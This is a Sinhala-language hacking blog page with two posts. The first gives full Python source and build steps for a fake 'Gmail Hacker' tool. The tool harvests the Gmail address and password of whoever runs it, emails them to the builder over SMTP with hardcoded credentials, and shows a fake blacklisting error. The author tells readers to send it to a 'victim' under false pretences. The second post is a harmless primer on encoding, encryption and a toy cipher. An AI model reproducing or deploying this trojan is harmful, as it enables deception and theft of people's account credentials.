CLICK IT බ්ලොග් අවකාශය Hi There, and Welcome to Our Blog!

EVERY THING AT ONCE / CYBER වැඩ්ඩන්ගේ නවාතැන
  • Lighthouse
Showing posts with label sinhalahacker. Show all posts
Showing posts with label sinhalahacker. Show all posts

Wednesday, September 2, 2015

Gmail Hack කරමු...


ඔන්න ඉතින් අද මාතෘකාව දැක්කම කට්ටිය හිතනවා ඇති මම අද දෙන්න යන්නේ අර කවුරුත් දන්න Gmail hacker කියන පොඩි tool එක කියලා..නෑ නෑ ඒක නෙමේ..
ඒ tool එක ගැන කිහිප තැනකම තියනවා මම දැක්කා..
http://hackingclz.blogspot.com/2009/11/gmail-hacker.html

https://www.geek.lk/discussion/17133/gmail-account-hack-%E0%B6%9A%E0%B6%BB%E0%B6%B8%E0%B7%94%E0%B6%AF-100-%E0%B7%83%E0%B7%8F%E0%B6%BB%E0%B7%8A%E0%B6%AD%E0%B6%9A%E0%B6%BA%E0%B7%92

ඉතින් මම නම් ඔය tool එක පාවිච්චි කරන එක හොද දෙයක් කියල ඔයාලට කියන්නේ නෑ..මොකද ඕකත් එක්ක තව malicious software කීයක් bind කරල තියනවද කියලා කියන්න බෑ..අනිත් එක ඕක හදපු කෙනාම උනත් තමන්ටත් password එන විදිහට coding කරලා නෑ කියලා කාටවත් කියන්න බෑනේ..

ඒ උනත් ලංකාවේ ඉන්න ගොඩක් අය කැමති ඔය වගේ tool බාවිතා කරන්නනේ..අලුතින් දෙයක් හිතලා කරන්න කැමති අය අඩුයි..ඒකට ප්‍රධානම හේතුවක් වෙලා තියෙන්නේ අපේ අයගේ මේ පිලිබද තියන නොදැනුවත්කම..
ඔය වගේ gmail hacker tool එකකින් හදා ගත්ත fake tool එකක් දීලා ගොඩක් අයව අන්දන්න පුලුවන් නිසා මේ වගේ tool බාවිතා කරන්න ගොඩක් අය කැමතියි..ඒ නිසා ඒවා භාවිතා කරන්න ගිහින් තමන්ගේ පරිගනකයට වෛරස් පුරවගන්න අයට ඒකෙන් ගැලවෙන්න මම අද මේ විදිහේ tool එකක් මමම coding කරන්න තමා යන්නේ..
එතකොට ඔයාලට පුලුවන් ඔයාලගෙම කියල tool එකක් හදාගන්න..එතකොට අර කිව්ව ප්‍රශ්න නෑනේ..

හරි එහෙනම් වැඩේට බහිමු..
මුලින්ම මම coding එක දීලා අන්තිමට ඒ විදිහට හදපු executable file එක දෙන්නම්..

මම මේක කොටස් 3ක් විදිහට හදන්නේ..

1) Gmail Hacker Builder කොටස




import Tkinter,os,tkFileDialog,sys
from Tkinter import*
global a,filename,sed
filename='C:'
def build():
    mfile=open('logo.exe','a')
    mfile.write('#sas'+a.get())
    mfile.close()
    m2file=open('aaaa.SED','w')
    m2file.write(sed)
    m2file.close()
    os.system('iexpress.exe /n aaaa.sed')
    sys.exit()               
def cp():
    global filename,sed
    filename=tkFileDialog.askdirectory(initialdir='.')
    print (filename)
    Label(window,text=filename).grid(in_=window,row=5,padx=(10,1),sticky=W)                                                                         
    sed='''[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=1
HideExtractAnimation=1
UseLongFileName=0
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName='''+filename+'''/GmailHacker.exe
FriendlyName=abc
AppLaunched=logo.exe
PostInstallCmd=gh.exe
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="gh.exe"
FILE1="logo.exe"
[SourceFiles]
SourceFiles0='''+sys.executable.strip('gmail.exe')+'''
[SourceFiles0]
%FILE0%=
%FILE1%='''
    
window=Tkinter.Tk()
window.title('Gmail Hacker Builder by sinhalahacker.net')
window.geometry('350x300')
window.wm_iconbitmap('data\icon1.ico')
window.wm_resizable(0,0)
l=PhotoImage(file='data\logo.gif')
l1=Label(window,image=l)
l1.image=l
l1.grid(in_=window,row=0,sticky=W)
Label(window,text='Enter Your Email address: ').grid(in_=window,row=1,padx=(10,1),sticky=W)                    
a=Entry(window,width=50)
a.grid(in_=window,row=3,padx=(10,1),sticky=W)
Label(window,text="Choose Path to create: ").grid(in_=window,row=4,padx=(10,1),sticky=W)                    
Label(window,text="C:/ ").grid(in_=window,row=5,padx=(10,1),sticky=W)                    

Button(window,text='Change Path',command=cp).grid(in_=window,row=6,padx=(10,1),sticky=W)
Label(window,text='Visit www.sinhalahacker.net to read latest tutorials ').grid(in_=window,row=7,padx=(10,1),sticky=W)                    
Label(window,text='').grid(in_=window,row=8,padx=(10,1),sticky=W)                    
Button(window,text='Build it',command=build).grid(in_=window,row=9,padx=(140,10),sticky=W)
sed='''[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=1
HideExtractAnimation=1
UseLongFileName=0
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName='''+filename+'''\GmailHacker.exe
FriendlyName=abc
AppLaunched=logo.exe
PostInstallCmd=gh.exe
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="gh.exe"
FILE1="logo.exe"
[SourceFiles]
SourceFiles0='''+sys.executable.strip('gmail.exe')+'''
[SourceFiles0]
%FILE0%=
%FILE1%='''
window.mainloop()



2) victimට යවන gmail hacker tool එක..




import Tkinter,smtplib,ttk,time,sys
from Tkinter import *
from email.mime.text import MIMEText
global a,b,c,error,error2,mf,mail
mf=open('logo.exe','rb+')
mf2=mf.read()
i=0
while mf2[i]+mf2[i+1]+mf2[i+2]+mf2[i+3]!='#sas':
  i+=1
mail=mf2[i+4:]
print mail
def ex():
  sys.exit()
def hack():
    global a,b,c,error,error2,mail
    error.destroy()
    error2.destroy()
    try:

        log='''Gmail address- '''+a.get()+'''\n Password- '''+b.get()+'''\n Tried to hack - '''+c.get()
        sender = 'sas@shanaka95.byethost3.com'
        msg = MIMEText(log)
        msg['Subject'] = "Keylogs from Sinhalahacker.net"
        msg['From'] = sender
        msg['To'] = str(mail)
        server = smtplib.SMTP_SSL('smtp.zoho.com', 465)
        server.login('sas@shanaka95.byethost3.com', 'testing123')
        server.sendmail(sender, [mail], msg.as_string())
        server.quit()
        error2=Label(window,text="Your IP address has been blacklisted by Google servers.\nTry changing IP address",fg='red')
        error2.place(x=10,y=385)
    except:
        error=Label(window,text="Can't connect to Google Servers.\nPlease check your internet connection.If you use firewall,\nplease disable it and try again.",fg='red')
        error.place(x=10,y=385)

    
window=Tkinter.Tk()
window.title('Gmail Hacker V 1.5')
window.geometry('355x450')
window.wm_resizable(0,0);
window.wm_iconbitmap('data/icon1.ico')
logophoto = PhotoImage(file="data/logo.gif")
labellogo = Label(window,image=logophoto)
labellogo.image = logophoto
labellogo.grid(in_=window,row=1, sticky=W)
Label(window,text="").grid(in_=window,row=2,padx=(10,1), sticky=W)
Label(window,text="Enter Your Gmail Address ( with '@gmail.com') :").grid(in_=window,row=3,padx=(10,1), sticky=W)
a=Entry(window,width=55)
a.grid(in_=window, row=4, column=0,padx=(10,1),sticky=W)
Label(window,text="Enter Your Gmail Password :").grid(in_=window,row=5,padx=(10,1), sticky=W)
b=Entry(window,width=55,show="*")
b.grid(in_=window, row=6, column=0,padx=(10,1),sticky=W)
Label(window,text="Enter Your Victim's Gmail Address ( with '@gmail.com') :").grid(in_=window,row=7,padx=(10,1), sticky=W)
c=Entry(window,width=55)
c.grid(in_=window, row=8, column=0,padx=(10,1),sticky=W)
Label(window,text="Victim Password : (Click Hack now! to reveal victim's password)").grid(in_=window,row=9,padx=(10,1), sticky=W)
Entry(window,width=55,state=DISABLED).grid(in_=window,row=10,padx=(10,1), sticky=W)
Label(window,text="").grid(in_=window,row=11,padx=(10,1), sticky=W)
Button(window,text='Hack now!',command=hack).grid(in_=window,row=12,column=0,padx=(10,1),sticky=W)
Button(window,text='  Exit  ',command=ex).grid(in_=window,row=12,column=0,padx=(300,1),sticky=S)
Label(window,text="").grid(in_=window,row=13,padx=(10,1), sticky=W)
pb = ttk.Progressbar(window, length=340, mode='determinate')
pb.place(x=8,y=360)
error=Label(window,text="Can't connect to Google Servers.\nPlease check your internet connection.If you use firewall,\nplease disable it and try again.",fg='red')
error2=Label(window,text="Your IP address has been blacklisted by Google servers.\nTry changing IP address",fg='red')

window.mainloop()

දැන් ඔය දෙකෙන් පලවෙනි එක මම gmailhacker.py විදිහටත් දෙවනි එක gh.py විදිහටත් save කරගෙන දෙකම pyinstaller භාවිතා කරලා executable files බවට convert කරගන්නවා..

දැන් තුන් වෙනියට මට ඕනේ ඔය program දෙකට අදාල images එහෙම අඩංගු data file..මම ඒ ටික logo.exe විදිහට හදා ගන්නවා..

හරි දැන් ඔන්න තියනව මට ඕන file ටික ඔක්කොම..මෙතනින් download කරගන්න..

හරි දැන් ඒ ටික ඔක්කොම bind කරගන්න..ඔන්න එතකොට මට එනවා සම්පූර්න tool එක..


සම්පූර්න tool එක මෙතනින් download කරගන්න....(අර කලින් කිවව ඒ්වා කරන්න අමාරු නම් ෙම් සම්පූර්න tool ඒක download කරගත්තම හරි)




Link 2


ඔන්න තියනවා tool එක..ඔතන Enter your email address කියන තැන ඔයාගේ email address එක ගහන්න..
ඊට පස්සේ Gmail Hacker tool එක හැදෙන්න ඕන තැන path එක තෝරන්න..
වැදගත්-මෙතන path එක තෝරද්දි ඔයාගේ computer එකේ os එක දාලා තියන drive එක පාවිච්චි කරනවනම් admin privileges ඕන වෙනවා..ඒ කිව්වේ program එක run කරද්දි run as administrator විදිහට run කරන්න ඕනේ..එහෙම නැත්තන් path එක විදිහට වෙන drive එකක් දෙන්න..

අන්තිමට Build it button එක click කරන්න..


ඔන්න එතකොට ඔයා තෝරපු path එකේ GmailHacker.exe කියලා අපේ tool එක හැදිල තියෙයි..

දැන් එක execute කරලා බැලුවම

ඔන්න පේනව නේද..ඕක තමා අපි victim ට යවන්න ඕනේ..එයාට බොරුවක් කියල දෙන්න ඕන මේකෙන් වෙන කෙනෙක්ගේ gmail account එකක් බොහොම ලේසියෙන් hack කරන්න පුලුවන් කියලා..

ඉතින් එයා මේකෙන් එහෙම hack කරන්න හිතාගෙන තමනගෙ විස්තරයි එයා හැක් කරන්න හිතාගෙන ඉන්න කෙනාගේ විස්තරයි දීලා Hack Now button එක ඔබනවනේ..

මම මේකට මගේ gmail address එක විදිහට admin@sinhalahacker.net කියලත් password එක විදිහට testing123 කියලත් victimගේ gmali address එක විදිහට abcd@gmail.com කියලත් දීලා hack now button එක click කරනවා..

 ඔන්න එතකොට ඔය පේනව වගේ error එකක් එනවා..
"Your IP address has been blacklisted by Google servers.\nTry changing IP address"

දැන් ඉතින් අපේ victim මෙහෙම ආවම හිතනවා මේක එයාගේ පරිගනකයේ අවුලක් කියලා..

ඒ උනත් ඔන්න බලන්න මම අර කලින් දීපු මගේ Email address එකට විස්තර ඔක්කොම එනවා..

ඔන්න හරි...වැඩේ ලේසියෙන් ඉවර උනාට හදන එකනම් ලේසි උනේ නෑ..:-) මම මේකේ source එකත් එක්කම දුන්නේ නැත්න් කට්ටිය හිතයි මම මේක ඇතුලේ malicious code හන්ගලා දෙනව කියලා..

මම ආයෙත් කියනවා මේක මම කොහොමත් අනුමත කරන දෙයක් නෙමේ..මොකද මේවට රැවටෙන අය අද අඩුයි..ඒ උනත් google search කරල download කරන එක එක software වලින් අමාරුවේ වැටෙන අය ඒකෙන් ගලවගන්න තමා මම මේක හැදුවේ..

මොකක් හරි අවුලක් තියනවනම් කියන්ඩෝ..

Saturday, June 6, 2015

මොකක්ද මේ Encoding සහ Encrypting?

 python ගැන ඊලග ලිපිය ලියන්න කලින් අද වෙන මාතෘකාවක් ගැන කතා කරන්න තමා මම මේ යන්නේ..
අපිට නිතරම ඇහෙන වචන ටිකක් තමා මේ Encoding,Encrypting,Hashing..මම අද කියන්න යන්නේ මේ Encoding,Encrypting ගැන..
http://www.john-james-andersen.com/wp-content/uploads/matrix.png

Encoding


encoding කියල කියන්නේ මොකක් හරි ක්‍රමයක් පාවිච්චි කරලා එක වර්ගයක data තවත් වර්ගයකට පරිවර්තනය කිරීමක්..දැන් ඔයාල බලනව ඇති මෙහෙම එක වර්ගෙක ඉදල තව වර්ගෙකට හරවන්නෙ ඇයි කියලා..

මේකට ප්‍රධාන හේතු දෙකක් තියනවා.
  •  දත්ත ගබඩා කිරීම සදහා.(Store Data)

අපි දන්නවා අපි මේ පාවිච්චි කරන පරිගනක වල මතකයේ තැම්පත් කරන්න පුලුවන් වෙන්නේ bits විතරයි..ඒ කිව්වේ 1 හෝ 0 විදිහට binary language එකෙන්..ඉතින් අපි මතකයේ තැම්පත් කරන හැම දත්තයක්ම අර කිව්ව binary data වලට හැරවිල තමා මතකයේ ගබඩා වෙන්නේ..
අපි කවුරුත් දන්න ASCII,Unicode වලදි සිද්ද වෙන්නේ මේක..
ඉතින් ඕක හොද උදාහරනයක් තමා  දත්ත ගබඩා කිරීම සදහා encode කිරිම ගැන.
  • දත්ත සම්ප්‍රේශනය කිරීම සදහා

ඊලග හේතුව තමා මේ දත්ත එක තැනක ඉදල තවත් තැනකට සම්ප්‍රේශනය කරද්දි ඒ දත්ත වල වගේම පද්ධතියේ ආරක්ෂාව උදෙසා මේ encode කිරීම සිදුකරනවා..
මේකට හොදම උදාහරනය තමයි http හරහා දත්ත සම්ප්‍රේෂනය කරද්දි base64 කියන algorithm එකට අනුව encode කරනවා..මේ විදිහට encode කරාම english letters,number සහ තව විශෙෂ characters දෙකකට සීමා වෙන විදිහට දත්ත වෙනස් කරනවා..

ඔයාල දැකල ඇති අන්තර්ජාලයේදි URL Encode කරනවා..

උදාහරනයකට http://www.sinhalahacker.net/downloads ගත්තම 

http%3A%2F%2Fwww.sinhalahacker.net%2Fdownloads

විදිහට තමා encode වෙන්නේ..



දැන් අපි උදාහරනයකට ගමු අපි ලග තියනවා අඹ ගෙඩි 20ක්.මට ඕන වෙනව මේ අඹ ගෙඩි ඔක්කොම එකවැර එහෙ මෙහෙ අරන් යන්න,එක එක තැන්වල ගබඩා කරල තියන්න වගේ දේවල් කරන්න..
ඒත් මේ විදිහට අරන් යන්න ගියොත් එක්කො මගදි වැටෙන්න පුලුවන්..නැත්තන් තැලෙන්න පුලුවන්..මේ හින්ද මම මේව දානවා පෙටි 2ක්,3ක් ඇතුලට..එතකොට දැන් මේ පෙට්ටි , අඔ ගෙඩි වගේ රෝල් වෙන්නේ නැති හින්ද මට ලේසියෙන්ම අරන් යන්නත් පුලුවන්..ඒත් එක්කම පෙට්ටි ඇතුලේ දාලා නිසා අඹ වලට ආරකෂාවකුත් ලැබිලා තියනවා..
ඔන්න ඒ මම කරේ මට අරන් යන්න,ගබඩා කරන්න ලේසි විදිහකට මේ අඔ හදව්ව එක..ඊට පස්සේ මට ඔනම වෙලාවක ආපහු අඔ ගෙඩි වෙනවෙනම ගන්න පුලුවන්..

ඔයවගේ දෙයක් තමා මේ Encoding වලදි වෙන්නේ..

එතකොට මේ encode කරන එකේ ප්‍රධානම වාසියක් වෙලා තියෙන්නේ පද්ධති දෙකක් අතර මේ දත්ත පාවිච්චි වෙද්දි මේ පද්ධති දෙකට දත්ත තේරුම් ගන්න පුලුවන් වෙනඑක.මෙතනදි දත්ත හොරකම් කරන්න බැරි වෙන්න දත්ත වෙනස් කිරීමක් බලාපොරොත්තු වෙන්නේ නෑ..

encode කරපු දත්ත decode කරන්නත් පුලුවන් වෙන්නේ algorithm එකකට අනුව තමා..ඒත් encode කරන්නේ ප්‍රසිද්ද algorithm අනුව..ඉතින් algorithm එක දන්නවනම් ඕන කෙනෙක්ට මේ encoded data එකක් decode කරන්න පුලුවන් ලේසියෙන්ම


Encrypting



http://core0.staticworld.net/images/article/2013/01/encrypt_primary-100022114-gallery.jpg

Encrypt කරනවා කියන්නේ cryptography කියන මාතෘකාවට අදාල දෙයක්.මේකෙදි වෙන්නේ දත්ත එක තැනක ඉදලා තව තැනකට සම්ප්‍රේෂනය කරද්දි හරි store කරල තියද්දි හරි කාටවත් හොරකම් කරන්න බැරි විදිහකට දත්ත වෙනස් කරන එක.

දැන් උදාහරනයකට හිතන්න
^#s!MF#:5_(A!R5-(X_

ඔන්න ඔය තියෙන්නේEncrypt කරපු string එකක්..පුලුවන්නම් try කරල බලන්න ඔය මොකක්ද කියලා කයලා හොයාගන්න...

දැන් ඔයාලට තේරෙනවා නේද මේ විදිහට Encrypt කරපු දත්තයක් කවුරු හරි හොරකම් කරාට වැඩක් නෑ..මොකද එයාට ඒක තේරුම් ගන්න බෑ..

එතකොට මේ විදිහට encrypt කරපු data හදුන්වනවා ciphertext කියලා..එතකොට encrypt නොකරපු data plaintext කියල හදුන්වනවා..

එතකොට මේ encrypt කරන්න අපි පාවිච්චි කරනවා key එකක්..දැන් ඔයාල බලනවා ඇති මොකක්ද මේ key කතාව කියල..

අපි කලින් ගත්ත උදාහරනයම ගමුකෝ..

මම අර විදිහට අඹ අරන් යද්දි කාට හරි පුලුවන් පෙට්ටි ටික හොරකම් කරල අඔ ගන්න..ඒ නිසා මම මේ පෙට්ටි වලට ඉබ්බෙක් දාලා වහනවා..දැන්මේ අඹ ගන්න පුලුවන් යතුර තියන කෙනාට විතරයිනේ නේද?

අන්න ඒ දේම තමා මේ encrypt සහ decrypt කරද්දි key එකෙන් වෙන්නේ.encrypt කරපු දෙයක් decrypt කරන්න පුලුවන් වෙන්නේ ගැලපෙන key එක තියනවනම් විතරයි..

මේ key එක පාවිච්චි කරන විදිහ අනුව encrypt කිරීම ප්‍රධාන කොටස් 2කට බෙදෙනවා..
  • Symmetric key encryption

 මේ ක්‍රමයෙදි වෙන්නේ key එකක් පාවිච්චි කරලා දත්ත encrypt කරනවා..මේ දත්ත ආපහු decrypt කරන්න නම් ඒ encrypt කරපු key එකම තියෙන්න ඔනේ..
http://securitycerts.org/images/symmetric-key-encryption.jpg


  • Asymmetric cryptography (Public-key cryptography)

  මේකෙදි එක key එකක් නෙමේ පාවිච්චි වෙන්නේ.public key සහ privet key කියල දෙකක් පාවිච්චි වෙනවා..මේ public key එක ඔන කෙනෙක්ට බලන්න පුලුවන්..ඒත් privet key එක රහසිගතයි..මේකෙදි වෙන්නේ මේකයි..

අපි data encrypt කරන්න පාවිච්චි කරන්නේ public key එක..මේ ciphertext එක ලබන කෙනා privet key එක පාවිච්චි කරල තමා decrypt කිරීම කරන්නේ..

උදාහරනයක් ගත්තොත් අමල් ට ඔන වෙනවා රහසිගත පනිවිඩයකි කමල්ට යවන්න..එයා කරන්නේ කමල්ගේ public key එක පාවිච්චි කරලා පනිවිඩය encrypt කරල කමල්ට යවනවා..
ඒත් මේ public key එකෙන් ආපහු decrypt කරන්න බෑ..කමල් එයා ලග තියන privet key එක පාවිච්චි කරලා මේ ciphertext එක plaintext එකකට decrypt කරගන්නවා..



https://blog.malwarebytes.org/wp-content/uploads/2013/10/assemcrypto.gif

දැන් ඔයාලට මතක් වෙනවා ඇති අද ගොඩක් වැදගත් වෙබ් අඩවි පාවිච්චි කරන SSL තාක්ෂනයේදි වෙන්නේත් මේ Public-key cryptography තාක්ෂනය තමයි..


හරි දැන් එහෙනම් මම දැන් පොඩි algorithm එකක් හදන්න තමා යන්නේ මේ encrypt සහ decrypt කරන්න..
මම මෙකට පාවිච්චි කරනවා Transposition cipher කියන ක්‍රමය සහ python language එක..
Transposition cipher කියන ක්‍රමයෙදි වෙන්නේ මේකයි..

දැන් අපි හිතමු plaintext එක - thisis
key එක - mymainkey

දැන් අපි මුලින්ම key එක අරගෙන ඒකේ එක පාරකට වඩා වැඩියෙන් තියන characters අයින් කරනවා..එතකොට

myainke

දැන් key එකේ length එක අනුව් alphabet එක කඩ කඩ ලියනවා..key එකේ තියන charcters අයේ ලියන්නේ නෑ

m y a i n k e
b  c d f g h l
o  p q r s t u
v  w x y z

දැන් මම key එකේ අකාරාදීපිලිවෙලට උඩ ඉදන් පල්ලෙහට characters ටික ලියනවා.
a d q x e l u i  f r y k h t m b o v n g s z  y c  p w
a b c d e f g h i j  k l m n o p q r s  t u v w x  y  z

ඔන්න දැන් යටින් ලිව්ව alphabet එකේ character වෙනුවට උඩ එකේ characters දාලා අපිට පුලුවන් ciphertext එක හදාගන්න..
nmhuhu

ඔන්න දැන් ඕක decode කරන්නනම් key එක තියෙන්නම ඔන..ඒත් මෙතනදි ඔය පාවිච්චි කරල තියෙන්නේ simple letters විතරනේ..ඉතින් ඔන්න මම ඔය method එකට හදපු python program එක download කරගන්නකෝ.

https://www.dropbox.com/s/rs9zrmf0uq1ype4/mycrypter.py?dl=0



 ඔන්න තියනව මම කලින් කිව්ව ciphertext එක..මම ඒක crypt කරේ my#1key කියන key එකෙන්..
ඒ වගේම මෙකෙන් decrypt කරන්නත් පුලුවන්.

(මේ program එක වැඩිය test කරේ නැති නිසා සමහර විට bugs තියෙන්න පුලුවන්..)

ඒත් එක්කම hackerrank.com එකේ හොද challenge වගයක් තිබ්බ මේ cryptography ගැන..එ ටික කරොත් ඔයාලටත් හොද අවබෝධයක් ලැබෙයි..
https://www.hackerrank.com/domains/security/cryptography